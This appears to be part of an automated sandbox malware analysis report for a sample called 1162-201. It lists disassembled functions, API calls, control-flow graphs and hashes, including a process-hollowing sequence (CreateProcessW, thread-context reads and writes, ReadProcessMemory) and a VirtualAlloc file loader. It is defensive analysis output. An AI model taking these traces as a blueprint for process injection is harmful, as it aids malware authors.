                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 444 314bf60-314c0a1 call 3149bb0 call 314be50 CreateFileW 451 314c0a3 444->451 452 314c0a8-314c0b8 444->452 453 314c158-314c15d 451->453 455 314c0bf-314c0d9 VirtualAlloc 452->455 456 314c0ba 452->456 457 314c0dd-314c0f4 ReadFile 455->457 458 314c0db 455->458 456->453 459 314c0f6 457->459 460 314c0f8-314c132 call 314be90 call 314ae50 457->460 458->453 459->453 465 314c134-314c149 call 314bee0 460->465 466 314c14e-314c156 ExitProcess 460->466 465->466 466->453
                                                                      APIs
                                                                        • Part of subcall function 0314BE50: Sleep.KERNELBASE(000001F4), ref: 0314BE61
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0314C097
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: I7JOA2ALREMDDFE7U
                                                                      • API String ID: 2694422964-720986988
                                                                      • Opcode ID: 6988f70f50044c4f1be51794f99a0638fac80154e4dcacd2608b124dc2d99e9c
                                                                      • Instruction ID: 09a9d310612788901589c6dfc0bb6728b92340e587c05c348db873ea7cbbb670
                                                                      • Opcode Fuzzy Hash: 6988f70f50044c4f1be51794f99a0638fac80154e4dcacd2608b124dc2d99e9c
                                                                      • Instruction Fuzzy Hash: 40518F74D04348EBEF11DBE4C854BEEBB79AF58700F044199E248BB2C1D7B91A44CBA5
                                                                      Function 00C23B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 468 c23b1c-c23b27 469 c23b99-c23b9b 468->469 470 c23b29-c23b2e 468->470 472 c23b8c-c23b8f 469->472 470->469 471 c23b30-c23b48 RegOpenKeyExW 470->471 471->469 473 c23b4a-c23b69 RegQueryValueExW 471->473 474 c23b80-c23b8b RegCloseKey 473->474 475 c23b6b-c23b76 473->475 474->472 476 c23b90-c23b97 475->476 477 c23b78-c23b7a 475->477 478 c23b7e 476->478 477->478 478->474
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C23B0F,SwapMouseButtons,00000004,?), ref: 00C23B40
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C23B0F,SwapMouseButtons,00000004,?), ref: 00C23B61
                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00C23B0F,SwapMouseButtons,00000004,?), ref: 00C23B83
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: 83624f29372261402125faf129cd5a9b94ec09b06bc6675ded936f89fea0a849
                                                                      • Instruction ID: ac3a7b6bb841a1ecc43cc28f1e3ce6f99e48789a6425f1cbdaca580817b76ed7
                                                                      • Opcode Fuzzy Hash: 83624f29372261402125faf129cd5a9b94ec09b06bc6675ded936f89fea0a849
                                                                      • Instruction Fuzzy Hash: 021127B5611268FFDB20CFA5EC84AAEBBB8EF04744B10856AB805D7110E2359F409BA0
                                                                      Function 0314AE50 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 479 314ae50-314aef0 call 314d2e0 * 3 486 314af07 479->486 487 314aef2-314aefc 479->487 489 314af0e-314af17 486->489 487->486 488 314aefe-314af05 487->488 488->489 490 314af1e-314b5d0 489->490 491 314b5d2-314b5d6 490->491 492 314b5e3-314b610 CreateProcessW 490->492 493 314b61c-314b649 491->493 494 314b5d8-314b5dc 491->494 498 314b612-314b615 492->498 499 314b61a 492->499 514 314b653 493->514 515 314b64b-314b64e 493->515 496 314b655-314b682 494->496 497 314b5de 494->497 501 314b68c-314b6a6 Wow64GetThreadContext 496->501 517 314b684-314b687 496->517 497->501 504 314ba11-314ba13 498->504 499->501 502 314b6ad-314b6c8 ReadProcessMemory 501->502 503 314b6a8 501->503 507 314b6cf-314b6d8 502->507 508 314b6ca 502->508 506 314b9ba-314b9be 503->506 512 314b9c0-314b9c4 506->512 513 314ba0f 506->513 510 314b701-314b720 call 314c960 507->510 511 314b6da-314b6e9 507->511 508->506 530 314b727-314b74a call 314caa0 510->530 531 314b722 510->531 511->510 518 314b6eb-314b6fa call 314c8b0 511->518 519 314b9c6-314b9d2 512->519 520 314b9d9-314b9dd 512->520 513->504 514->501 515->504 517->504 518->510 535 314b6fc 518->535 519->520 524 314b9df-314b9e2 520->524 525 314b9e9-314b9ed 520->525 524->525 526 314b9ef-314b9f2 525->526 527 314b9f9-314b9fd 525->527 526->527 533 314b9ff-314ba05 call 314c8b0 527->533 534 314ba0a-314ba0d 527->534 538 314b794-314b7b5 call 314caa0 530->538 539 314b74c-314b753 530->539 531->506 533->534 534->504 535->506 546 314b7b7 538->546 547 314b7bc-314b7da call 314d300 538->547 540 314b755-314b786 call 314caa0 539->540 541 314b78f 539->541 548 314b78d 540->548 549 314b788 540->549 541->506 546->506 552 314b7e5-314b7ef 547->552 548->538 549->506 553 314b825-314b829 552->553 554 314b7f1-314b823 call 314d300 552->554 556 314b914-314b931 call 314c4b0 553->556 557 314b82f-314b83f 553->557 554->552 564 314b933 556->564 565 314b938-314b957 Wow64SetThreadContext 556->565 557->556 560 314b845-314b855 557->560 560->556 563 314b85b-314b87f 560->563 566 314b882-314b886 563->566 564->506 567 314b959 565->567 568 314b95b-314b966 call 314c7e0 565->568 566->556 569 314b88c-314b8a1 566->569 567->506 575 314b968 568->575 576 314b96a-314b96e 568->576 571 314b8b5-314b8b9 569->571 573 314b8f7-314b90f 571->573 574 314b8bb-314b8c7 571->574 573->566 577 314b8f5 574->577 578 314b8c9-314b8f3 574->578 575->506 580 314b970-314b973 576->580 581 314b97a-314b97e 576->581 577->571 578->577 580->581 582 314b980-314b983 581->582 583 314b98a-314b98e 581->583 582->583 584 314b990-314b993 583->584 585 314b99a-314b99e 583->585 584->585 586 314b9a0-314b9a6 call 314c8b0 585->586 587 314b9ab-314b9b4 585->587 586->587 587->490 587->506
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0314B60B
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0314B6A1
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0314B6C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                      • Instruction ID: 48eb3120dec4c8bba98b340e5395d20cfae9676e3d4ea4173b093c388cb60907
                                                                      • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                      • Instruction Fuzzy Hash: A862FB74A14258DBEB24CFA4C850BDEB376EF58300F1091A9D10DEB394E77A9E81CB59
                                                                      Function 00C2DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Variable must be of type 'Object'., xrefs: 00C732B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable must be of type 'Object'.
                                                                      • API String ID: 0-109567571
                                                                      • Opcode ID: aa6e77c62de965a958b3255f7713a8135186c082f745b79597dc5b21a65345fd
                                                                      • Instruction ID: 18abf69e14f8011c94efc4cdb9baaa182f99e5964b2468cdee07151aae361a11
                                                                      • Opcode Fuzzy Hash: aa6e77c62de965a958b3255f7713a8135186c082f745b79597dc5b21a65345fd
                                                                      • Instruction Fuzzy Hash: 81C28B71A00224CFCB24DF98D884BADB7B1BF08310F248569E956BB7A1D375EE41DB91
                                                                      Function 00C23923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1099 c23923-c23939 1100 c23a13-c23a17 1099->1100 1101 c2393f-c23954 call c26270 1099->1101 1104 c63393-c633a2 LoadStringW 1101->1104 1105 c2395a-c23976 call c26b57 1101->1105 1107 c633ad-c633b6 1104->1107 1111 c2397c-c23980 1105->1111 1112 c633c9-c633e5 call c26350 call c23fcf 1105->1112 1109 c23994-c23a0e call c42340 call c23a18 call c44983 Shell_NotifyIconW call c2988f 1107->1109 1110 c633bc-c633c4 call c2a8c7 1107->1110 1109->1100 1110->1109 1111->1107 1114 c23986-c2398f call c26350 1111->1114 1112->1109 1126 c633eb-c63409 call c233c6 call c23fcf call c233c6 1112->1126 1114->1109 1126->1109
                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C633A2
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C23A04
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                      • String ID: Line:
                                                                      • API String ID: 2289894680-1585850449
                                                                      • Opcode ID: d0aa22e7abeb7c8776c2b94b23f62154a3be3be61ce10d1ee965c6a4b2e1ff9f
                                                                      • Instruction ID: 99eadbe3d41a91bdc409fa20d2f3ab17a4c8b283f3830bc786537e70b9972387
                                                                      • Opcode Fuzzy Hash: d0aa22e7abeb7c8776c2b94b23f62154a3be3be61ce10d1ee965c6a4b2e1ff9f
                                                                      • Instruction Fuzzy Hash: E031E3715083A4ABC325EB20EC45FEFB3E8AB41310F04092AF599825A1DB749B49DBD3
                                                                      Function 00C3FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1135 c3fddb-c3fdde 1136 c3fded-c3fdf0 call c4ea0c 1135->1136 1138 c3fdf5-c3fdf8 1136->1138 1139 c3fde0-c3fdeb call c44ead 1138->1139 1140 c3fdfa-c3fdfb 1138->1140 1139->1136 1143 c3fdfc-c3fe00 1139->1143 1144 c3fe06-c4066d call c4059c call c432a4 1143->1144 1145 c4066e-c40690 call c405cf call c432a4 1143->1145 1144->1145 1155 c40697 1145->1155 1156 c40692 1145->1156 1156->1155
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00C40668
                                                                        • Part of subcall function 00C432A4: RaiseException.KERNEL32(?,?,?,00C4068A,?,00CF1444,?,?,?,?,?,?,00C4068A,00C21129,00CE8738,00C21129), ref: 00C43304
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00C40685
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3476068407-410509341
                                                                      • Opcode ID: a856ad0e9ce1f173ac098b56388bb856459f0e8e6770235707b236350592e9b7
                                                                      • Instruction ID: 5f53520884f127979cc0f491dc6b15941f3ed7ed66226b56b960af289e67f58c
                                                                      • Opcode Fuzzy Hash: a856ad0e9ce1f173ac098b56388bb856459f0e8e6770235707b236350592e9b7
                                                                      • Instruction Fuzzy Hash: D2F0C23494060DB78B00BA65E84AC9E7B6CBE40310B704535BE2896592EF71DB6AD990
                                                                      Function 00C210F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C21BF4
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C21BFC
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C21C07
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C21C12
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C21C1A
                                                                        • Part of subcall function 00C21BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C21C22
                                                                        • Part of subcall function 00C21B4A: RegisterWindowMessageW.USER32(00000004,?,00C212C4), ref: 00C21BA2
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C2136A
                                                                      • OleInitialize.OLE32 ref: 00C21388
                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00C624AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID:
                                                                      • API String ID: 1986988660-0
                                                                      • Opcode ID: 347a1ac9f7a65ff812de16e5dff176074de5b15de981ef8cb142fd9a46e08bf2
                                                                      • Instruction ID: 9593dc22fbdba46e8d0597eedd62f356b6cb5ee8a432d188450cea0b16101e9a
                                                                      • Opcode Fuzzy Hash: 347a1ac9f7a65ff812de16e5dff176074de5b15de981ef8cb142fd9a46e08bf2
                                                                      • Instruction Fuzzy Hash: 3071ABB4911244CFC784EF7AA9457BD3AE0FB9839475D822AED0ACB2A1EB314444DF43
                                                                      Function 00C586AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,00C585CC,?,00CE8CC8,0000000C), ref: 00C58704
                                                                      • GetLastError.KERNEL32(?,00C585CC,?,00CE8CC8,0000000C), ref: 00C5870E
                                                                      • __dosmaperr.LIBCMT ref: 00C58739
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 2583163307-0
                                                                      • Opcode ID: bf1ec7d8455da0d6f24934c963950affb11eb7b4a6fa363925c5c51caef6b8ae
                                                                      • Instruction ID: e021187d1d5b25a395236bfb7b996fd7896776822e4b03f7f978691c658d6199
                                                                      • Opcode Fuzzy Hash: bf1ec7d8455da0d6f24934c963950affb11eb7b4a6fa363925c5c51caef6b8ae
                                                                      • Instruction Fuzzy Hash: 9D016B3AA1562017D3606234A84577E27494F91776F390219FC28AB0E2DEA08DCDD15C
                                                                      Function 00C31310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 00C317F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: CALL
                                                                      • API String ID: 1385522511-4196123274
                                                                      • Opcode ID: 4ab5bf44efd3aa0a4c0941f5057fcdd7b84b18738fe3f498843704622faf8d43
                                                                      • Instruction ID: 8111a31a317eb38b8682992be1538004ce3a1d4f12ba557ef8981db7281538b8
                                                                      • Opcode Fuzzy Hash: 4ab5bf44efd3aa0a4c0941f5057fcdd7b84b18738fe3f498843704622faf8d43
                                                                      • Instruction Fuzzy Hash: 2F228A706183019FC714DF25C484B2ABBF1BF89314F28892DF89A8B3A1D731E945DB92
                                                                      Function 00C22DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00C62C8C
                                                                        • Part of subcall function 00C23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C23A97,?,?,00C22E7F,?,?,?,00000000), ref: 00C23AC2
                                                                        • Part of subcall function 00C22DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C22DC4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                      • String ID: X
                                                                      • API String ID: 779396738-3081909835
                                                                      • Opcode ID: 64a04eb7f8ff782a03f9fc8ee0c760b47b2651a84dd99222002d438ffcd5b09a
                                                                      • Instruction ID: 2da9e425c9c4dced4351ae37b17c109e18fc932f88031d25f5fe49cbc280c60f
                                                                      • Opcode Fuzzy Hash: 64a04eb7f8ff782a03f9fc8ee0c760b47b2651a84dd99222002d438ffcd5b09a
                                                                      • Instruction Fuzzy Hash: D321D570A102A8AFDF11EF94D845BEE7BFCAF58314F004059E405B7241DBB85A49DFA1
                                                                      Function 00C23837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C23908
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: 64e4049668ef0b82e5e8018917ffe63086de287c865caaa2ef3953401f6b74e3
                                                                      • Instruction ID: 8d2c3f0d6f85074824b9041dd24e3defddfd1863171f71091c73a5c1d3aef583
                                                                      • Opcode Fuzzy Hash: 64e4049668ef0b82e5e8018917ffe63086de287c865caaa2ef3953401f6b74e3
                                                                      • Instruction Fuzzy Hash: 7A31C370604351CFD320DF25D8847ABBBF8FB49318F00092EF99987690E775AA48CB52
                                                                      Function 00C25745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C2949C,?,00008000), ref: 00C25773
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00C2949C,?,00008000), ref: 00C64052
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 76d8491b72029b199921f976ae50418b3f3b152dfc95ba4edfdaa87307d01e3e
                                                                      • Instruction ID: 8cf9f52728bac43093e61109a2cec3822166144a1c9c821a42fd074bbe3cde25
                                                                      • Opcode Fuzzy Hash: 76d8491b72029b199921f976ae50418b3f3b152dfc95ba4edfdaa87307d01e3e
                                                                      • Instruction Fuzzy Hash: 8C017931185335BAE7315A2ADC4EF9B7F54DF06B70F148310BA6C6A1E0C7B45554CB90
                                                                      Function 00C2B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 00C2BB4E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      • Opcode ID: b84b9d549ff5c63ec3156de2bd2fec956217693ee0f220c3f331bb9bec228e16
                                                                      • Instruction ID: ab4a8cdceb332bb6aa255710e91920d7010dcdd4d0ec3649b7f875bccb5ee085
                                                                      • Opcode Fuzzy Hash: b84b9d549ff5c63ec3156de2bd2fec956217693ee0f220c3f331bb9bec228e16
                                                                      • Instruction Fuzzy Hash: 1C32DF75A00219DFCB20CF54D894BBEB7B9FF44300F248059E929AB6A1C774EE81DB91
                                                                      Function 0314AE4D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0314B60B
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0314B6A1
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0314B6C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
